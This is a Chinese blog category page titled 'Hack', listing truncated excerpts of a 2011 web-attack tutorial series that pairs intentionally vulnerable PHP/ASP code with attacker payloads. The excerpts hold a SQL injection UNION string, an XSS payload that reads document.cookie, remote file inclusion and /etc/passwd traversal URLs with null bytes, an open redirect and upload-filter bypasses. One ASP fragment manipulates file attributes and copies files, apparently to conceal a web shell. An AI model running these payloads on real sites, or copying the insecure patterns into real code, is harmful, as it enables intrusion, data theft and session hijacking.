随笔分类 - Hack
摘要:http://www.libnfc.org/documentation/introductionhttp://code.google.com/p/libnfc/source/browse/trunk/README
阅读全文
摘要:http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/md5/
阅读全文
摘要://2011-11-28 星期一 //程序员思想: <? session_start(); $admin = $_POST['admin']; $pass = md5($_POST['pass']); $codes = $_POST['codes']; if($_GET['action'])...{ if($result=$db->Execute("select * from x_admin where a_admin='".$admin."'"))...{ if
阅读全文
摘要://2011-11-27 星期日 //正则实战(2): Preg_match验证URL $subscr=$_REQUEST['subscr']; //url validation if (preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i', $subscr)) { print "$subscr url OK."; } else { print "$subscr url not valid!"; } //echo("$subsc
阅读全文
摘要://2011-11-26 星期六 //正则实战: 字符串匹配: function isUsername($element) { return !preg_match ("/[a-zA-Z0-9_\-]/", $element); } ?> 密码匹配: $password = "Fyfjk34sdfjfsjq7"; if (preg_match("/^.*(?=.{8,})(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).*$/", $password)) { echo "Your passwords is
阅读全文
摘要://2011-11-24 星期四 //程序员的思想 <% '略 attachdir="/"+sitePath+"upload"'上传文件保存路径,结尾不要带/ dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录 建议使用按天存 maxattachsize=2097152'最大上传大小,默认是2M upext="txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid"'上传扩展名 '略 if upfile.is
阅读全文
摘要://2011-11-23 星期三 //Cookie篇 /* 序 */ 讲起注入,就要从防住入说起,但防注入一般只对QueryString和Form做了防范,却忽略了Cookies,自然,注入就产生了,我们从实战出发。 //程序员思想 //Micropoor.asp代码片段 <% //略 Set rsnews=Server.CreateObject("ADODB.RecordSet") sql="update news set hits=hits+1 where id="&cstr(request("id")) conn.
阅读全文
摘要://2011-11-22 星期二 //插入篇----Php程序员角度看安全 //今天全局我们站在Php程序员的角度看待问题 //以及解决问题 结论:一切的输入都是有害的. //参考Php安全新闻早8点(2011-11-12 星期六) [url]http://hi.baidu.com/micropoor/blog/item/f200689bf907af56d1135ec6.html[/url] 既然是一切的输入都是有害的,那么就从输入输出讲起。 ################################################## 1.接受任何变量的时候,都请记住,是有害的开始。确
阅读全文
摘要:'2011-11-21 星期一 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% '略 dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath dim dirTemplate : dirTemplate="../Upload" dim path : path=getForm("path","get") :
阅读全文
摘要://2011-11-18 星期五 //知识点讲解:urlencode //返回字符串,此字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)。此编码与 WWW 表单 POST 数据的编码方式是一样的,同时与 application/x-www-form-urlencoded 的媒体类型编码方式一样。由于历史原因,此编码在将空格编码为加号(+)方面与 RFC1738 编码不同。 //PHP 手册中,urldecode 函数原文引用: The superglobals $_GET and $_REQUEST are already de.
阅读全文
摘要:'2011-11-20 星期日 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% dim upload,file,formName,formPath,iCount,fileformat //......略 end function formPath="2010/" //......略 set file=upload.file(formName) ''生成一个文件对象 //......略 if fileformat=".asp" or fileformat="
阅读全文
摘要://2011-11-19 星期六 //程序员的思维 //Micropoor.php代码片段 <?php //略 $modd=$_GET[mod]; … if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){ require_once './source/module/$modd.php'; //略 } //我们的思维 index.php?mod=http://www.cnblogs.com/1.php%00 //其他条件 php.in
阅读全文
摘要://2011-11-18 星期五 //知识点讲解:urlencode //返回字符串,此字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)。此编码与 WWW 表单 POST 数据的编码方式是一样的,同时与 application/x-www-form-urlencoded 的媒体类型编码方式一样。由于历史原因,此编码在将空格编码为加号(+)方面与 RFC1738 编码不同。 //PHP 手册中,urldecode 函数原文引用: The superglobals $_GET and $_REQUEST are already de.
阅读全文
摘要://2011-11-16 星期三 // 程序员的思维: // Micropoor.php ---代码片段 <?php $Micropoor=$_GET[Micropoor]; include($Micropoor.'php'); ?> //我们的思维: [url]http://www.127.0.0.1/Micropoor.php?Micropoor=/http://www.cnblogs.com/http://www.cnblogs.com/../etc/passwd%00[url] // 程序员的思维: // Micropoor.php ---代码片段 <
阅读全文
摘要://2011-11-15 星期二 // 管理员的思维: 查找asp,php,jsp,.net脚本文件关键词 //我们的思维: <% Set fso = CreateObject("Scripting.FileSystemObject") sFile = Server.Mappath("/index.asp") Set objFile = fso.GetFile(sFile) if objFile.attributes <> 32 then:objFile.attributes = 32:end if fso.CopyFile Serve
阅读全文
摘要://2011-11-14 星期一 // 程序员的思维: // Micropoor.php ---代码片段 <?php redirect_page = $_GET['page']; header ("Location: " . redirect_page); ?> Exp:Micropoor.php?page=http://hi.baidu.com/micropoor // 程序员的思维: <?php echo "Hello Micropoor" . $_SERVER['HTTP_REFERER']; ?&
阅读全文
摘要://2011-11-13 星期日 // 程序员的思维: // Micropoor.php ---代码片段 <?php $id= $_GET['id']; $query= "SELECT * FROM users WHERE id= ' “ .$id." ;" //略 ?> //我们的思维: index.php?id=1+UNION+SELECT+1,@@version+from+users-- // 程序员的思维: //Micropoor.php ---代码片段 <? $user = $_POST['user
阅读全文
摘要:// 2011-11-12 星期六 // 程序员的思维: // index.php ---代码片段 <?php $Micropoor = $_GET['Micropoor']; print $Micropoor; ?> //我们的思维: index.php?Micropoor=<script>alert(document.cookie)</script> ############################################################ // 程序员的思维: // index.php ---代码片段 &l
阅读全文
浙公网安备 33010602011771号